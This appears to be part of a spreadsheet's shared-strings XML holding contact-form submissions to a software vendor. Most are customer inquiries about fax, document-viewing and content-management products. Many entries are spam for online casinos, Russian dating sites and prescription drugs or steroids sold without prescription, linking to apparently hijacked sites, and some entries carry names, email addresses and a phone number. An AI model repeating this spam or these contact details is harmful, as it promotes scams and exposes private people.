    <t>DM or ECM for archival of internal reports for R&amp;D. Looking for option/alternative to SharePoint</t>
  </si>
  <si>
    <t>dgilia@sacil.xyz</t>
  </si>
  <si>
    <t>unable to reset the user password.  I will also like to have our customer ID</t>
  </si>
  <si>
    <t xml:space="preserve">В связи с рецепцией римского права старые германские публичные формы сделок с недвижимостью стали приходить в забвение. Но это вредило развитию ипотеки. Кредитор, предоставлявший кредит под залог недвижимости, никогда не мог быть уверен в том, что на той же недвижимости нет других, ранее установленных закладных прав; вследствие этого такие ссуды были сопряжены с большим риском и поэтому давались на очень тяжелых условиях. _x000D_
[url=http://dominickctjz36936.blogzet.com/]akciya[/url]|_x000D_
</t>
  </si>
  <si>
    <t>I have a customer I support looking to add RightFax, and I'd like a quote for software and remote installation.</t>
  </si>
  <si>
    <t>We are evaluating various viewers for redacting and markup to recommend for our customer for use with Alfresco. Kindly provide a trial version of brava for the same. Thanks</t>
  </si>
  <si>
    <t>UTILIZAVA O PROGRAMA GRATUITO VISUALIZADOR DE ARQUIVOS DWG, MAS PARECE QUE ELE ESTÁ SENDO DESCONTINUADO (?)._x000D_
PEÇO QUE ME CONFIRMEM ESSA INFORMAÇÃO E ME INFORMEM QUAL A ALTERNATIVA GRATUITA OFERECIDA PELO DESENVOLVEDOR AOS USUÁRIOS._x000D_
NO AGUARDO,_x000D_
MAURICIO</t>
  </si>
  <si>
    <t>testing open text for ilm solution</t>
  </si>
  <si>
    <t>Nesecito cursos</t>
  </si>
  <si>
    <t>online slots _x000D_
[url=http://playcasinoonline24.com/]casino games[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games&lt;/a&gt; _x000D_
best online casino</t>
  </si>
  <si>
    <t>Wish to opt in to receive information from you. Opted out this morning by mistake.</t>
  </si>
  <si>
    <t xml:space="preserve">Согласно действующему российскому праву, сделки с недвижимостью подлежат обязательной государственной регистрации и считаются заключенными только при условии такой регистрации. При этом регистрирующий орган производит соответствующую запись в Единый государственный реестр прав на недвижимое имущество и сделок с ним (ЕГРП). Сделка с недвижимостью (приватизация, мена, дарение, завещание, купля-продажа, рента) при отсутствии государственной регистрации считается незаключенной и не несет правовых последствий. При этом регистрации подлежит переход права собственности по данному договору. В России регистрацию сделок с недвижимостью ведет специальный государственный орган — Федеральная служба государственной регистрации, кадастра и картографии. Существует две формы заключения сделок — нотариальная и простая письменная, имеющие совершенно одинаковую юридическую силу. _x000D_
[url=http://johnnyundt14704.blogzet.com/]raznoe[/url]|_x000D_
</t>
  </si>
  <si>
    <t>For a client I am looking for a solution to generate and safely store documents as part of a bigger HR IT solution SuccessFactors</t>
  </si>
  <si>
    <t xml:space="preserve">I have a charge of $1.02 on my master card from your company, 1) how did you get my card number?(Amount is not the problem its how you did it) I've reported it to proper authorities and they will follow up.  Its a SCAM, for sure, test run at a 1.02 if okay go for larger amounts. If it is your company or anyone associated with you, I have told my card holder to charge you accordingly.  </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Hi,_x000D_
 _x000D_
Greetings of the day!_x000D_
 _x000D_
I wish this is something you might be looking for your Business needs, newly updated permission based database from all across the Ecommerce Business Leads._x000D_
_x000D_
•	CXO’s Of Ecommerce / Modern Retail Organizations_x000D_
•	MD/ E-Commerce Executives/ President_x000D_
•	Marketing / Operations Director_x000D_
•	IT/E-Commerce Management/ Web Development Director_x000D_
•	Catalog/Direct / Pure-Play Web / Online Merchants_x000D_
•	Contact Center Management Director_x000D_
•	Omni-Channel Retailing/Communications Director_x000D_
•	Head of E-Commerce/ Online Media Owners_x000D_
•	Purchase / Vendor Management Department Heads_x000D_
•	Web &amp; Viral Marketers _x000D_
•	Ecommerce IT Professionals/ Website Designers / Developers_x000D_
•	Fulfillment/ Content /Online Reputation Managers_x000D_
•	Marketing/Data/Customer Relation Manager_x000D_
•	Sales/Operations/ Delivery /Return Managers_x000D_
•	Loss Prevention/Cyber-Security Managers_x000D_
•	Inventory/Distribution/ Store Design Managers_x000D_
•	HR /Recruitment Manager_x000D_
•	Logistic/E-Logistic/Supply Chain Manager_x000D_
•	Others allied to this industry_x000D_
_x000D_
Segments:_x000D_
_x000D_
•	Virtual Merchant/E-Retailer/ Retail Chain_x000D_
•	Wholesaler/Distributor/ Manufacturer_x000D_
•	E-Commerce Service / Platform Providers_x000D_
•	E Businesses / E - Tailing Companies_x000D_
•	Mail-Order / Catalog / Modern Online Retail Companies_x000D_
•	Ecommerce Marketing Solution Companies_x000D_
•	Store Brand/Multi Brand Retailer/ Retail Chains_x000D_
•	Retail Real Estate &amp; Shopping Malls_x000D_
•	Small Stores / Enterprises/ Fulfillment Centers_x000D_
•	Department/Specialty/ Discount/Independent Stores_x000D_
•	Shopping Portals and Sites/ Hosting and Data Centers_x000D_
•	Online Business Directories/ Marketing Automation Firm_x000D_
•	Email Marketing / Digital Marketing Companies_x000D_
•	Mobile Apps / Social Media Companies_x000D_
•	Web Analytic &amp; Performance Organizations_x000D_
•	Ecommerce Technology Solutions Organization_x000D_
•	Ecommerce Customer Relations - Service &amp; Support Organizations_x000D_
•	Ecommerce Outsourced Fulfillment Organizations_x000D_
•	Acquisition/Conversion Solutions Organization_x000D_
•	Delivery &amp; Fulfillment </t>
  </si>
  <si>
    <t>online casino real money _x000D_
[url=http://playcasinoonline24.com/]casino games slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online slots&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t xml:space="preserve">Even when Blake Griffin returns, Rivers should find a way to keep Aldrich in the rotation.”Video: Watch Gurriel Interview (in Spanish), with game footageWhen.For a player who will mostly serve as a bench player, that will be a tough contract to swallow. _x000D_
[url=http://filasabi.portalsabi.com/home.asp?p_id=nike-jordan-basketball-shoes]nike jordan basketball shoes[/url]_x000D_
[url=http://filasabi.portalsabi.com/home.asp?p_id=nike-long-padded-coat]nike long padded coat[/url]_x000D_
 _x000D_
d it wasn’t long before he donned the Eagles’ jersey in a 2003 match against Argentina at the ripe old age of 20.There is something amazing when you look up and see nothing but sky and a city skyline in the background. _x000D_
These two numbers show us that he is not executing his pitches as well as he would like._x000D_
</t>
  </si>
  <si>
    <t>non funzionano più le notifiche di nuove mail in arrivo</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are a software company in Israel which developed an output management solution on top of Siemens PLM system._x000D_
Our product is aimed to solve and facilitate the process of collecting, processing, converting, printing and distributing technical documents to subcontractors, suppliers, customers etc. _x000D_
The product is already productive and is sold in the US, Europe and Israel._x000D_
We are contacting you since we are looking to replace our current conversion\print engine with a stable and robust solution._x000D_
Since OpenText has a solution for various information systems, we believe it will probably answer most of our requirements._x000D_
_x000D_
I will appreciate if we could schedule a short meeting to discuss the option of joining forces and provide the best solution to Siemens PLM customers._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Noam Rubin</t>
  </si>
  <si>
    <t>WANT TO BUY A LICENCE COPY OF Gutpa Team Developer</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.t2gm.net/confirm/anymore.php?jump=237]Hgh Fragment 176-191 Dosage[/url]_x000D_
 Use temperatures to manage the soreness! Among the signs or symptoms connected with Rheumatoid arthritis is agonizing bones. You will find positive activities that you can use to support ease a few of the discomfort. One of many practical steps you could possibly take is to consider temperature and cool treatment! Making use of cold as well as heat treatment options are unable to only minimize the discomfort, additionally, it may reduce the rigidity associated with Joint inflammation._x000D_
  [url=http://www.gglobal.in/imns/lib.asp?m=579-Viagra-Generika-Erfahrungen-Cialis-GÃ¼nstig-Kaufen-Ohne-Rezept-Kamagra-Apotheke-Online]Viagra Generika Erfahrungen[/url]_x000D_
 In case you are at a bistro where the costs from the red wine are outrageous, tend not to be embarrassed to order beer. Sometimes, eating places will jack up their prices with the knowledge that the client is originating to drink red wine and may obtain it anyways. This will help to help you save a ton of money in the long run._x000D_
  [url=http://www.bharattravelservice.com/images/green.asp?qqq=596/]Viagra Precio Farmacia[/url]_x000D_
 Trading from developments could be a error, except when you're inside for the long term. The primary forces of industry momentum can be very obvious easily, and should be compensated close up awareness of. Not the process has wrecked multiple buying and selling job._x000D_
  [url=http://www.mescargo.com/images/green.asp?f=84/]Hygetropin Buy Online Uk[/url]_x000D_
</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
J'aurais aimé avoir des informations sur l'application BRava reader._x000D_
Nous sommes à la recherche d'une application simple supportant pdf, tif, JPG._x000D_
Pouvez-vous me recontacter par mail avec une brochure, svp?_x000D_
Je souhaiterais également avoir des informations sur les licences. Sont-elles mono-poste, serveur/flottante? Egalement de la redevance de maintenance est-elle obligatoire?_x000D_
Merci pour votre aide_x000D_
Cordialement_x000D_
Jordan LEUVREY</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Request for quotation for legacy documentum._x000D_
please contact me for more information_x000D_
_x000D_
Thanks,_x000D_
Mir Faiz Ali</t>
  </si>
  <si>
    <t>Hello. I can't get access to My Support. _x000D_
After confirming email address still "No Access"_x000D_
"We're sorry, your account does not grant you access to this resource."</t>
  </si>
  <si>
    <t>Request for trail software for the POC at Customer site.</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
I have raised request for my Support Account . Can you please provide an update on it ?_x000D_
Thanks,_x000D_
Susmitha.</t>
  </si>
  <si>
    <t>Would like to see product demo and see how it can benefit us.</t>
  </si>
  <si>
    <t>Interesado</t>
  </si>
  <si>
    <t xml:space="preserve">По германскому же обычному праву переход земли из рук в руки был обставлен различными довольно сложными формальностями (символическая передача земли, инвеститура, Auflassung). _x000D_
[url=http://tysonqgwm81581.blogzet.com/]zhmi[/url]|_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.srivenkatesazlds.com/client/main.asp?people=630]Viagra Ohne Rezept Auf Rechnung[/url]_x000D_
 When you have read through in the article earlier mentioned, you can find quite a few techniques linked to filing personal individual bankruptcy, and also bears lots of accountability. This approach need to be utilized as a final option and you should be aware of the outcomes of producing such a challenging decision. Don't be also hasty to submit and keep the ideas in mind using this report, whenever you do!How To Cope With A Payday Advance_x000D_
  [url=http://www.hepll.com/images/cache.asp?te=76-Cialis-I-Prostata-Cialis-Apotek-Century-Levitra-20]Cialis I Prostata[/url]_x000D_
 Familiarizing your self with a bit of common life insurance phrases can help you decide which type is perfect for you, along with just how much insurance coverage you want to obtain. Income worth refers to the part of your plan which is available to you to take out as personal loans for various reasons, including education and learning costs or credit debt. Reasonably limited is simply the periodic repayment which you make to maintain the insurance policy energetic. Yet another word you might see is benefits, which refers to the funds you could get back again in your costs if the insurer overestimated their bills and wound up with a surplus. A dividend is just not guaranteed._x000D_
  [url=http://www.karolinfisekci.com/css/file.asp?as=74]jintropin prices[/url]_x000D_
 The best way to conserve a few bucks is usually to add more insulating material for your hot water water heater. Most of the vitality required to temperature this type of water in your home is the expense from maintaining this type of water from the tank warm for when it is necessary. Incorporating an added covering of insulation can help decrease this cost._x000D_
  [url=http://www.farukkaynak.com/highslide/move.asp?u=23]Jintropin Precio[/url]_x000D_
</t>
  </si>
  <si>
    <t>Can I get the pricing policy for Web Content Management and Digital Asset Management?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello there, _x000D_
We, Covestro IT and business team in Hong Kong would like to meet with you or your sales representative team in our Hong Kong office to understand more about the EDI solutions and especially the Email2EDI/Fax2EDI solution that opentext offers._x000D_
Feel free to contact me for further information, and we would like to have the meeting in the next 2 weeks, thank you.  _x000D_
_x000D_
Ed_x000D_
</t>
  </si>
  <si>
    <t>please sent a copy of open text enterprise connector</t>
  </si>
  <si>
    <t>I have some questions about the opentext._x000D_
Is it possible to cover web and digital signage with opentext?_x000D_
Please reply to me</t>
  </si>
  <si>
    <t>Premdorduert@altrmed.ru</t>
  </si>
  <si>
    <t>online slots _x000D_
[url=http://playcasinoonline24.com/]slots online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games real money&lt;/a&gt; _x000D_
casinos online</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://lastnewstoday.ru/pr/adult][img]http://lastnewstoday.ru/pr/adult/images/9068b248538e.jpg[/img][/url] _x000D_
 _x000D_
[url=http://lastnewstoday.ru/pr/adult]бесплатное знакомства отношение[/url] _x000D_
 _x000D_
Онлайн клуб знакомств с целью интима. лучшие встречи с противоположным полом для C... у тебя городе. Заглядывай - тебе понравится! _x000D_
 _x000D_
 бадоо сайт знакомств, бесплатное знакомства регистрация бесплатно онлайн, знакомства онлайн без регистрации бесплатно, знакомства белгород, знакомства майл ру вход, сайт знакомств номера, tabor ru знакомства моя страница, 55 знакомства, jeempo знакомство, знакомства в интернете, сайт серьезных знакомств регистрация бесплатно, навечно сайт знакомств, лесби знакомства, табор знакомства без регистрации, нгс знакомства новосибирск, знакомства 40 лет, знакомства с военными, mylove ru знакомства, знакомства иванова, знакомства через, бесплатное знакомство без регистрации с женщинами, сайт знакомств с девушками, знакомства без пароля, сайт знакомств без регистрации бесплатно для серьезных, знакомства табор ру бесплатный, самый сайт знакомств, сайт знакомств для отношений бесплатной регистрацией, официальное знакомство, знакомства с девушками бесплатно регистрация, бесплатные сайты знакомств отношений без регистрации, знакомства вход регистрация, знакомства без регистрации бесплатно с девушками, знакомства в туле, знакомства в томске, хочу знакомства, сайт знакомств бесплатная регистрация для серьезных отношений, знакомства в казани, блюсистем знакомства, частные объявления знакомства, фильм знакомство с факерами, знакомства вологда, знакомство с факерами 2, знакомства великий, знакомства улан, официальный сайт знакомств, гей знакомства объявления, сайт знакомств майл ру, знакомства за 40 без регистрации бесплатно, знакомства смоленск, знакомства без регистрации вход, сайт знакомства loving _x000D_
</t>
  </si>
  <si>
    <t>Currently have two fax servers one rightfax and another provider. Systems are several releases behind we believe cloud is the future for the company</t>
  </si>
  <si>
    <t>slot online _x000D_
[url=http://playcasinoonline24.com/]cassino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino games&lt;/a&gt; _x000D_
casino slots</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.comitium.hr/editor/access.php?hp=10-Jintropin-Hgh,Jintropin-Hgh-Fake,Hygetropin-Wiki.html]Jintropin Hgh[/url]_x000D_
 When you are thinking which policy to purchase, be sure to cautiously think about just how much insurance you truly require. Do you need both accidents and extensive protection or perhaps 1? Also ensure that you examine coverage prices from different companies, as similar policies from distinct organizations may differ substantially in cost._x000D_
  [url=http://www.tradala.com/balu/achieve.php?xu=834-Oxandrolone-Dosage-Anavar-Oxandrolone-For-Sale-Uk-Methandienone-Price-In-Usa/]Oxandrolone Dosage[/url]_x000D_
 Do not use bright hues in your bedroom. Folks typically rest in sleeping rooms. Obviously, a master bedroom ought to be a soothing spot to be in. Regardless how a lot you could possibly much like the colour orange, let it rest from the boudoir. Dazzling colors do not have spot in the bed room. Regardless of whether they search fine at first, making use of them may well be a selection you go to feel dissapointed about._x000D_
  [url=http://www.moracle.co.uk/images/list.php?a=111-Cialis-Pas-Cher-Bordeaux,Levitra-France-Pharmacie,Vente-Viagra-Internet]Cialis Pas Cher Bordeaux[/url]_x000D_
 Wouldn't life be excellent if there have been no this kind of factor as pressure? Properly, believe it or not, we do need some tension in your lifestyles. It's when stress levels increase too much or can be found at all times that stress turns into a problem. Integrating a few of the subsequent anxiety administration strategies into the everyday schedule can assist you maintain healthier levels of stress plus a more calm existence._x000D_
  [url=http://www.pickamemory.com/wp-admin/destaques.php?d=1619-Trenbolone-Powder-Conversion-Mesterolone-Cycle-Primobolan-Powder-Conversion/]Trenbolone Powder Conversion[/url]_x000D_
</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://playcasinoonline24.com/]slots online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t xml:space="preserve">Potential Partnership </t>
  </si>
  <si>
    <t xml:space="preserve">Компания [url=http://mstore-nn.ru/]MachineStore[/url] обеспечивает производственные, строительные и торговые организации, а также домашних мастеров разнообразным инструментом, технологической оснасткой, сварочным оборудованием, бензомоторной техникой. Ассортимент предлагаемой нами продукции постоянно расширяется и на сегодняшний день составляет свыше 5000 наименований инструмента. _x000D_
Всегда в наличии:  _x000D_
[url=http://mstore-nn.ru/elektroinstrument/nozhnicy/nozhnicy-vyrubnye-bosch-gna-35-0601533103.html]Ножницы вырубные BOSCH GNA 3,5 0601533103[/url] </t>
  </si>
  <si>
    <t>your employee is cheated with us and destoryed my store ego minded person</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://playcasinoonline24.com/]casino online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t xml:space="preserve">В Российской Федерации _x000D_
[url=http://angeloaqhv25815.blogzet.com/]po-ssylke[/url]|_x000D_
</t>
  </si>
  <si>
    <t>slots online _x000D_
[url=http://playcasinoonline24.com/]casino games slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online slots&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t>To get help on DCTM products</t>
  </si>
  <si>
    <t>online casino games _x000D_
[url=http://playcasinoonline24.com/]best online casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino real money&lt;/a&gt; _x000D_
kasino</t>
  </si>
  <si>
    <t>Hello, I am Eric Yoon, a security analyst in Korea._x000D_
_x000D_
 _x000D_
_x000D_
(For proof of my identity, I have attached my career experience.)_x000D_
_x000D_
 _x000D_
_x000D_
I would like to ask you politely and am writing this email to ask you for an interview with the subject of current forensic trends and future in the United States._x000D_
_x000D_
 _x000D_
_x000D_
In personally, I have a great interest in the American forensic market and the future._x000D_
_x000D_
 _x000D_
_x000D_
So, I would like to invite you to the interview on the 25th after the Enfuse conference in Las Vegas._x000D_
_x000D_
 _x000D_
_x000D_
I ask for an interview because I want to know more about forensics._x000D_
_x000D_
(Please note that there is no commercial purpose.)_x000D_
_x000D_
 _x000D_
_x000D_
The interview will be conducted in two major ways._x000D_
_x000D_
1. Company Introduction_x000D_
_x000D_
2. Forensic Current, and Future_x000D_
_x000D_
 _x000D_
_x000D_
If the interview is finished and you want it, I will write on Korean SNS or blog based on the contents._x000D_
_x000D_
I think this will be effective._x000D_
_x000D_
 _x000D_
_x000D_
In summary, there are two major things I would like to get in your interview._x000D_
_x000D_
1. Understanding Your Company_x000D_
_x000D_
2. US Forensic Current and Future (including brief technology and market)_x000D_
_x000D_
 _x000D_
_x000D_
On the contrary, this is the part where I can give you the help._x000D_
_x000D_
1. Public relations effect for company_x000D_
_x000D_
2. Acquired Korean translation for company_x000D_
_x000D_
3. Organizing current and Future Directions about company, forensics and cyber security) _x000D_
_x000D_
 _x000D_
_x000D_
Thank you for reading this valuable time._x000D_
_x000D_
 _x000D_
_x000D_
I'll wait your reply._x000D_
_x000D_
 _x000D_
_x000D_
Thank you._x000D_
_x000D_
 _x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Eric.</t>
  </si>
  <si>
    <t>Конкуренцию стандартным петельным межкомнатным открывающимся конструкциям составляют более функциональные решения – сдвижные двери. Они так же включают в себя полотна из древесины или иного материала, вот только главные элементы блока движутся по прямым линиям (направляющим) параллельно стене. Читайте об этом подробнее на сайте [url=http://akro-spb.ru]akro-spb.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
[url=http://seorussian.ru]Разработка сайтов[/url]   - [url=http://seorussian.ru]seorussian.ru[/url]</t>
  </si>
  <si>
    <t>Job purpose</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.alarabi.info/backup/mail.php?eee=387-igf-lr3-gains-ansomone-hgh-fake-growth-hormone-therapy/]igf lr3 gains[/url]_x000D_
 A simple way to revamp your home is usually to reface your cabinets and change the computer hardware. It is an inexpensive undertaking that most individuals are capable of doing their selves. There are lots of computer hardware items sold in computer hardware retailers, and it is then readily accessible sections which fit your individual style._x000D_
  [url=http://www.casettaniconi.com/images/mall.php?imagination=171-Buy-Boldenone-Undecylenate-Uk-Methenolone-Oral-Tadalafil-Supplier.html]Buy Boldenone Undecylenate Uk[/url]_x000D_
 Preview all video games that you just get for your children to make certain they are era suitable. Additionally it is essential to talk to the mother and father of your children's close friends to find out what sort of games are permissible at their friends houses. When you can't preview the game, locate a review on-line to help you guide your decision._x000D_
  [url=http://www.consultelhotelaria.com.br/img/cache.php?marin=970]Raw Clomid Powder[/url]_x000D_
 If you are intending to get a pre-owned iPhone, ensure that the vendor supplies a return policy. When your mobile phone fails to job the way you would like it to or sufficiently provide what you need, you would like to make sure to might take it back. If you purchase new, the producer will warranty the item if it is malfunctioning. Make sure your utilized iphone 4 gives the very same to prevent wasting your money._x000D_
  [url=http://www.jbakerstudio.com/system/access.php?n=1252-Testosterone-Cypionate-South-Africa,Oxandrolone-Uk,Testosterone-Isocaproate-Uses]Testosterone Cypionate South Africa[/url]_x000D_
</t>
  </si>
  <si>
    <t>online casino slots _x000D_
[url=http://playcasinoonline24.com/]online casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;kasino&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t>slots online _x000D_
[url=http://playcasinoonline24.com/]casino slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games&lt;/a&gt; _x000D_
online slots</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.livingstoncommunityacupuncture.com/wp-content/cabecalho.php?you=612-Methandienone-10mg-China,Nandrolone-Steroids,Trenbolone-Acetate-Powder-Suppliers/]Methandienone 10mg China[/url]_x000D_
 If dried up heating will not be creating the required back discomfort comfort, attempt implementing wet temperature to the back again. Some people realize that the humidity may help the warmth pass through into the sore muscle tissues more, therefore supplying more effective relief of pain. A steamed bath towel or moistened heating package can offer that purpose._x000D_
  [url=http://support.wysiwyg.fr/includes/academia.php?view=1342-Testosterone-Manufacturers-Usa,Methandienone-Usa,Tadalafil-Powder-For-Sale]Testosterone Manufacturers Usa[/url]_x000D_
 Shop thrift merchants to collect an experienced clothing. Company apparel might be high-priced. It really is anything we all need, nonetheless, whenever we will be to express the appropriate image at work. Thrift merchants offer an affordable choice for each of our clothing requirements. You don't ought to explain to any person where you purchased it or exactly how much you paid out!_x000D_
  [url=http://www.jackcallaghans.com/templates/state.php?i=136-Kigtropin-Hgh-Price,Hygetropin-100iu-Price,Riptropin-Hgh-Reviews]Kigtropin Hgh Price[/url]_x000D_
 Determine why your pearly whites are discoloured prior to starting any lightening remedy. A vacation to your dentist ought to answer this question. Being aware of the reason behind your stained tooth will give you the very best treatments to your distinct problems and for that reason you will additionally get the best final results also._x000D_
  [url=http://www.ambulance.gr/components/com_content/achieve.php?sui=570-Is-Methasterone-Legal-Anabolic-Steroid-Names-Testosterone-Injections-Ireland/]Is Methasterone Legal[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hi, three weeks ago I have requested an evaluation version of your NFS client. After replying to a list of questions send to me by Christopher Hodgetts on April 3rd I haven't heard from you again, even after sending another email to Christopher. I am still interested in having an evaluation version of the NFS client, but time is becoming of importance so I hope that you at least respond to this mail and let me know if/when I can expect the requested evaluation client._x000D_
_x000D_
Regards,_x000D_
_x000D_
Philippe Dirkse</t>
  </si>
  <si>
    <t>online casino games _x000D_
[url=http://playcasinoonline24.com/]slots online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino online&lt;/a&gt; _x000D_
casino slots</t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://playcasinoonline24.com/]slot online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;slot game&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://playcasinoonline24.com/]play casino games online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino slots&lt;/a&gt; _x000D_
casino games slots</t>
  </si>
  <si>
    <t>My name is Robert Henry and I work for the George Washington University Hospital’s IT Department. We are currently reviewing all production applications for Windows 10 compatibility. Is our version of your RightFax application compatible? Thanks for your help.</t>
  </si>
  <si>
    <t>casino slots _x000D_
[url=http://playcasinoonline24.com/]cassino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games real money&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t>Hi I have an account with OpenText Careers and would like to close it due to privacy concerns. I could not find an option to close the account. Email ID is rdeborah@rediffmail.com. Kindly close/delete this account immediately. Thanks Deborah</t>
  </si>
  <si>
    <t>online slots _x000D_
[url=http://playcasinoonline24.com/]casino games[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;slots online&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.dmgeventspecialist.com/cache/slider.php?id=94]Hgh Cos'Ã¨[/url]_x000D_
 There have been reports which may have demonstrated that folks who are suffering from allergic reactions have realized alleviation by including honey in their diet. Although not technically verified, it really is worth trying. So the very next time you are at the farmer's industry, pick up some local bee honey to see when it helps reduce your signs and symptoms._x000D_
  [url=http://www.ebanknoteshop.com/Content/BBEditor/caree.php?ul=60-Cialis-EspaÃ±a-]Breakout-Cialis-Comprar-Contrareembolso-Generico-Cialis-Barato/[/url]_x000D_
 It might be really unpleasant to be intimately engaged in a discussion with anyone who has horrible air. Probably it really is one thing they ate, or just simple aged bad dental treatments behavior. No matter what the situation could be, a good way to aid yourself out of this circumstance would be to hold around periodontal or mints. Have a single your self and provide them 1 at the same time. As a result a courteous action a successful covert operations._x000D_
  [url=http://www.dogankaya.com/guvCode/example.asp?p=118]Cialis Preise Apotheke[/url]_x000D_
 To keep your student (and yourself) linked to the globe beyond the property-college class room, volunteer. Volunteer jobs are gratifying and provides excellent actual-world experience. Look for possibilities that carefully suit your student's pursuits. You could also search for possibilities that closely correspond with existing instruction. Pupils be proud of the ability to aid other folks and will appreciate the opportunity to get away from home._x000D_
  [url=http://www.carmitabrigadeiros.com/img/system.php?id=318]hgh injections cost[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hello.  I'm trying to find more detail on our current GXS software support.  I'd like to determine when it expires and what the renewal process is.  Thank you.</t>
  </si>
  <si>
    <t>best online casino _x000D_
[url=http://playcasinoonline24.com/]online gambling casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games&lt;/a&gt; _x000D_
online casino gambling</t>
  </si>
  <si>
    <t>Actively exploring Support Contract for a small documentum based document management system</t>
  </si>
  <si>
    <t>Hello Sir/Madam,_x000D_
_x000D_
I want to extract handwritten text from unconstrained images. _x000D_
I was wondering what would be the result of text recognition (as well as arrow) by "OpenText Captiva Advanced Recognition" and which product would be the best._x000D_
_x000D_
I Look forward to hearing from you._x000D_
_x000D_
Regards,_x000D_
Fatemeh</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is Amanda Slansky. I submitted an application for the Account Executive - South East position, and just want to make sure my resume came through correctly. I attached a couple of different versions (I didn't see where I could remove them once posted), because when i previewed them the formatting was very "off" for some reason. I just really think I could potentially be a great fit for this position, and have heard good things about OpenText from friends who work/have worked there, so I'd hate to be excluded from consideration because I submitted my resume from a laptop that just might be older than me :) Please let me know if I should send it as an attachment from my personal computer over the weekend, and who I should send that to, and I will be happy to do it! _x000D_
_x000D_
Have a great weekend, and thank you in advance.</t>
  </si>
  <si>
    <t>Our company want to implement OpenText like web solution, then we want to know if is possible make that process directly with OpenText._x000D_
May be we can give us the contact with mexico office._x000D_
Thanks</t>
  </si>
  <si>
    <t>Do you off an online training course in Live Link?</t>
  </si>
  <si>
    <t xml:space="preserve">Software request for for Brava to merge scanned TIFF files. </t>
  </si>
  <si>
    <t>I got a message trying to update my password,_x000D_
that it failed. "error updating password" _x000D_
I am trying to download new software from open text.</t>
  </si>
  <si>
    <t>cialis ahumada generic cialis pro</t>
  </si>
  <si>
    <t>Proposal Request for Crowne Plaza Hotel West Bay, Doha-Qatar</t>
  </si>
  <si>
    <t>I am trying to buy Brava TX   I keep entering my credit card information and the password i set up.  It continues to come back with correct Errors.  I would appreciate a human being calling me,  This is about as frustrating as i can take.  I'm trying to buy your product.  I need this product.  Jack Young   904 626 4863</t>
  </si>
  <si>
    <t>Researching DAM solutions</t>
  </si>
  <si>
    <t xml:space="preserve">To your owners.  If they are so concerned about global warming then what are the doing about curbing the population growth, air travel, pollution in China, Indian, Europe, and the Middle East and the United States. </t>
  </si>
  <si>
    <t>I want to request the free trial for the OpenText NFS Client. Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">need to discuss need for product support contract </t>
  </si>
  <si>
    <t>Would like a demo and rundown of what D2 has to offer?</t>
  </si>
  <si>
    <t>WTF? Free viewer, but it's not free! You must rename it!</t>
  </si>
  <si>
    <t xml:space="preserve">We are doing a research and will like to collect data from the internet or web and load or connect the data to a destination database for searching. Can you and/or your company or organization help us in this matter?_x000D_
If you don't mind, do you have (the know-how to develop and implement them) or know a good source of IT TOOLS OR APPLICATIONS OR SOFTWARE such as:_x000D_
WebCrawler: For web-based collection of data with GUI that can help user identify various actions such as specifying the start URL, Maximum URLs to be crawled, the way the crawling has to be done – breadth first or depth first._x000D_
API(s) creator: to create API(s) and route or dispatch the API(s)._x000D_
API Content Creator to create pdf, words, eBook or book or digital products, advertising and marketing materials through/via auto-posting through or via online outlets or channels or activities nodes._x000D_
API(s) connector: to connect API(s)_x000D_
API(s) integrator: to integrate API(s)_x000D_
API(s) manager or management: to manage API(s)_x000D_
Creation of custom APIs server with multiple end points and multiple clients_x000D_
Creation or Building a Custom database_x000D_
INTEGRATION OR CONNECTION OR RECONFIGURATION OF APIS AND AS FOLLOWS: _x000D_
Business Partners APIs include the affiliate programs. For examples Click Bank, Warrior Plus, JVzoo etc._x000D_
